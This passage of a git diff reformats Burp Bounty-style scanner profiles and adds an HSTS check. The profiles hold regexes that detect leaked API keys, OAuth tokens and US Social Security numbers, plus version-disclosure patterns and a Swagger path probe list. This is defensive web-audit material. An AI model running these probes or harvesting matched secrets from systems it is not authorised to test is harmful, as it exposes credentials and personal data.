,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Software Version revealed","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"Software Version revealed","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Software_Version_revealed",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,(0|[1-9]\\d*)\\.(0|[1-9]\\d*)\\.(0|[1-9]\\d*)(?:-((?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9]\\d*|\\d*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?",
+ "true,Or,(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)\\.(0|[1-9][0-9]*)(?:-((?:0|[1-9][0-9]*|[0-9]*[a-zA-Z-][0-9a-zA-Z-]*)(?:\\.(?:0|[1-9][0-9]*|[0-9]*[a-zA-Z-][0-9a-zA-Z-]*))*))?(?:\\+([0-9a-zA-Z-]+(?:\\.[0-9a-zA-Z-]+)*))?"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Software Version revealed",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "Software Version revealed",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/SonarQube_API_Key_Docs.bb b/profiles/SonarQube_API_Key_Docs.bb
old mode 100644
new mode 100755
index 75a3b8a..31225f6
--- a/profiles/SonarQube_API_Key_Docs.bb
+++ b/profiles/SonarQube_API_Key_Docs.bb
@@ -1 +1,59 @@
-[{"Name":"SonarQube_API_Key_Docs","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?i)sonar.{0,50}(\\\\\\\"|\u0027|`)?[0-9a-f]{40}(\\\\\\\"|\u0027|`)?"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"SonarQube Api Key Docs","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "SonarQube_API_Key_Docs",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,(?i)sonar.{0,50}(\\\\\\\"|\u0027|`)?[0-9a-f]{40}(\\\\\\\"|\u0027|`)?"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "SonarQube Api Key Docs",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/StackHawk_API_Key.bb b/profiles/StackHawk_API_Key.bb
old mode 100644
new mode 100755
index bb4c49f..6cbde61
--- a/profiles/StackHawk_API_Key.bb
+++ b/profiles/StackHawk_API_Key.bb
@@ -1 +1,59 @@
-[{"Name":"StackHawk_API_Key","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,hawk\\.[0-9A-Za-z\\-_]{20}\\.[0-9A-Za-z\\-_]{20}"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"StackHawk API Key","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "StackHawk_API_Key",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,hawk\\.[0-9A-Za-z\\-_]{20}\\.[0-9A-Za-z\\-_]{20}"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "StackHawk API Key",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Strict-Transport-Security.bb b/profiles/Strict-Transport-Security.bb
new file mode 100755
index 0000000..5373b1e
--- /dev/null
+++ b/profiles/Strict-Transport-Security.bb
@@ -0,0 +1,59 @@
+[
+ {
+ "ProfileName": "Strict-Transport-Security",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@egarme",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,Strict-Transport-Security"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": true,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": true,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Strict-Transport-Security",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "Security Header \"Strict-Transport-Security\" not present in response.",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Swagger-Finder.bb b/profiles/Swagger-Finder.bb
index 47b178a..1dfc8f5 100755
--- a/profiles/Swagger-Finder.bb
+++ b/profiles/Swagger-Finder.bb
@@ -1 +1,69 @@
-[{"Name":"Swagger-Finder","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["/swagger-ui.html","/swagger/swagger-ui.html","/api/swagger-ui.html","/swagger/index.html","/v1.0/swagger-ui.html","/v2.0/swagger-ui.html","/v3.0/swagger-ui.html"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,id\u003d\"swagger"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":4,"MaxRedir":5,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Swagger-Finder","IssueSeverity":"Low","IssueConfidence":"Firm","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[65],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Swagger-Finder",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@egarme",
+ "Payloads": [
+ "true,/swagger-ui.html",
+ "true,/swagger/swagger-ui.html",
+ "true,/api/swagger-ui.html",
+ "true,/swagger/index.html",
+ "true,/v1.0/swagger-ui.html",
+ "true,/v2.0/swagger-ui.html",
+ "true,/v3.0/swagger-ui.html"
+ ],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,id\u003d\"swagger"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": false,
+ "ContentType": "",
+ "HttpResponseCode": "",
+ "NegativeCT": false,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 0,
+ "RedirType": 4,
+ "MaxRedir": 5,
+ "payloadPosition": 1,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Swagger-Finder",
+ "IssueSeverity": "Low",
+ "IssueConfidence": "Firm",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [
+ 65
+ ],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Swagger_found.bb b/profiles/Swagger_found.bb
old mode 100644
new mode 100755
index c4a84d2..172d442
--- a/profiles/Swagger_found.bb
+++ b/profiles/Swagger_found.bb
@@ -1 +1,59 @@
-[{"Name":"Swagger_found","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,swagger-ui.html"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Swagger url found","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"Swagger url found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Swagger_found",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,swagger-ui.html"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 1,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Swagger url found",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "Swagger url found",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Twitter_Client_ID.bb b/profiles/Twitter_Client_ID.bb
old mode 100644
new mode 100755
index 2b34703..7705c60
--- a/profiles/Twitter_Client_ID.bb
+++ b/profiles/Twitter_Client_ID.bb
@@ -1 +1,59 @@
-[{"Name":"Twitter_Client_ID","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?i)twitter(.{0,20})?[\u0027\\\"][0-9a-z]{18,25}"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Twitter Client ID","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Twitter_Client_ID",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,(?i)twitter(.{0,20})?[\u0027\\\"][0-9a-z]{18,25}"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Twitter Client ID",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Twitter_OAuth.bb b/profiles/Twitter_OAuth.bb
old mode 100644
new mode 100755
index 34e489b..a60d207
--- a/profiles/Twitter_OAuth.bb
+++ b/profiles/Twitter_OAuth.bb
@@ -1 +1,59 @@
-[{"Name":"Twitter_OAuth","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}[\u0027\\\"\\\\s][0-9a-zA-Z]{35,44}[\u0027\\\"\\\\s]"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Twitter OAuth","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Twitter_OAuth",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}[\u0027\\\"\\\\s][0-9a-zA-Z]{35,44}[\u0027\\\"\\\\s]"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "Twitter OAuth",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/US_SSN.bb b/profiles/US_SSN.bb
old mode 100644
new mode 100755
index 7d13eac..50861be
--- a/profiles/US_SSN.bb
+++ b/profiles/US_SSN.bb
@@ -1 +1,60 @@
-[{"Name":"US_SSN","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,^((?!0{3})(?!6{3})[0-8]\\d{2}-(?!0{2})\\d{2}-(?!0{4})\\d{4})","true,Or,[^a-zA-Z0-9]((?!0{3})(?!6{3})[0-8]\\d{2}-(?!0{2})\\d{2}-(?!0{4})\\d{4})"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"US SSN","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "US_SSN",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 2,
+ "Author": "@six2dez1",
+ "Payloads": [],
+ "Encoder": [],
+ "UrlEncode": false,
+ "CharsToUrlEncode": "",
+ "Grep": [
+ "true,,^((?!0{3})(?!6{3})[0-8]\\d{2}-(?!0{2})\\d{2}-(?!0{4})\\d{4})",
+ "true,Or,[^a-zA-Z0-9]((?!0{3})(?!6{3})[0-8]\\d{2}-(?!0{2})\\d{2}-(?!0{4})\\d{4})"
+ ],
+ "Tags": [
+ "All"
+ ],
+ "PayloadResponse": false,
+ "NotResponse": false,
+ "TimeOut1": "",
+ "TimeOut2": "",
+ "isTime": false,
+ "contentLength": "",
+ "iscontentLength": false,
+ "CaseSensitive": false,
+ "ExcludeHTTP": false,
+ "OnlyHTTP": false,
+ "IsContentType": true,
+ "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
+ "HttpResponseCode": "",
+ "NegativeCT": true,
+ "IsResponseCode": false,
+ "ResponseCode": "",
+ "NegativeRC": false,
+ "urlextension": "",
+ "isurlextension": false,
+ "NegativeUrlExtension": false,
+ "MatchType": 2,
+ "Scope": 2,
+ "RedirType": 0,
+ "MaxRedir": 0,
+ "payloadPosition": 0,
+ "payloadsFile": "",
+ "grepsFile": "",
+ "IssueName": "US SSN",
+ "IssueSeverity": "Information",
+ "IssueConfidence": "Certain",
+ "IssueDetail": "",
+ "RemediationDetail": "",
+ "IssueBackground": "",
+ "RemediationBackground": "",
+ "Header": [],
+ "VariationAttributes": [],
+ "InsertionPointType": [],
+ "Scanas": false,
+ "Scantype": 0,
+ "pathDiscovery": false
+ }
+]
\ No newline at end of file
diff --git a/profiles/Version_Headers.bb b/profiles/Version_Headers.bb
old mode 100644
new mode 100755
index f1a3e46..3ebdf98
--- a/profiles/Version_Headers.bb
+++ b/profiles/Version_Headers.bb
@@ -1 +1,115 @@
-[{"Name":"Version_Headers","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,accounting\\.js v([\\d.]+)","true,Or,akka-http\\/([\\d.]+)","true,Or,Alterian-CME\\/([\\d.]+)","true,Or,([-\\d.]+)amzn1.x86_64","true,Or,AOLserver\\/([\\d.]+)","true,Or,Apache\\/([\\d.]+(?: \\([ \\w]+\\))?)","true,Or,Apache-Coyote\\/([\\d.]+)","true,Or,Apache Subversion\u003c\\/a\u003e\\s+version\\s+([\\d.]+(?:\\s*\\(r\\d+\\))?)","true,Or,Apache Tomcat\\/([\\d.]+)","true,Or,ARR\\/([\\d.]+)","true,Or,Artifactory\\/([\\d.]+)","true,Or,ASP\\.NET Version:([\\d.]+)","true,Or,awselb\\/([\\d.]+)","true,Or,((?i)Boa)\\/(\\d+\\.[\\d.rc]+)","true,Or,Cherokee\\/(\\d+\\.[\\d.b]+)(\\s+\\([a-zA-Z]+\\))?","true,Or,CKEDITOR.*version:\"([\\d.]+)\"","true,Or,Communique\\/([\\d.-]+)","true,Or,Ember\\.VERSION\\s*\u003d\\s*[\"\u0027]([\\w.]+)[\"\u0027]","true,Or,http:\\/\\/errors\\.angularjs\\.org\\/([\\d.]+)\\/","true,Or,h2o\\/([\\d.]+(-DEV)?)","true,Or,Hiawatha v([\\d.]+)","true,Or,Handlebars\\.VERSION\\s*\u003d\\s*[\"\u0027]([\\w.]+)[\"\u0027]","true,Or,IBM_HTTP_Server\\/([\\d.]+)","true,Or,IWeb\\/([\\d.]+)","true,Or,Jetty\\s?\\(?([a-z\\d.]+)\\)?","true,Or,JBoss-([\\d.]+(?:GA)?)","true,Or,JBoss-EAP\\/([\\d.]+)","true,Or,JBoss_([\\d_]+)","true,Or,JBPAPP_([\\d_]+(?:GA)?)","true,Or,JBoss\\s?Web[\\/-]{1}([\\d.]+(?:GA)?)","true,Or,\\bjdk(\\d[x\\d._]+)","true,Or,Joomla! ([\\d.]+)","true,Or,\\bJSF\\/([\\d.]+)","true,Or,JSP\\/([\\d.]+)","true,Or,jQuery JavaScript Library v([\\d.]+)","true,Or,jQuery UI ([\\d.]+)","true,Or,jQuery UI Core ([\\d.]+)","true,Or,jQuery UI Touch Punch ([\\d.]+)","true,Or,jQuery hashchange event - v([\\d.]+)","true,Or,jQuery Tiny Pub\\/Sub - v([\\d.]+)","true,Or,jquery[\\/-]([\\d-.]+)","true,Or,jQuery v([\\d.]+)","true,Or,Liferay Portal Enterprise Edition ([\\d.]+)","true,Or,lighttpd\\/([\\d.]+)","true,Or,Linux (\\d+\\.[a-z0-9\\.\\-_]+)","true,Or,LiteSpeed\\/([\\d.]+)","true,Or,Microsoft-HTTPAPI\\/([\\d.]+)","true,Or,Microsoft-IIS\\/([\\d.]+)","true,Or,Microsoft \\.NET Framework Version:([\\d.]+)","true,Or,Microsoft \\.NET Framework ([\\d.]+)","true,Or,MicrosoftSharePointTeamServices: 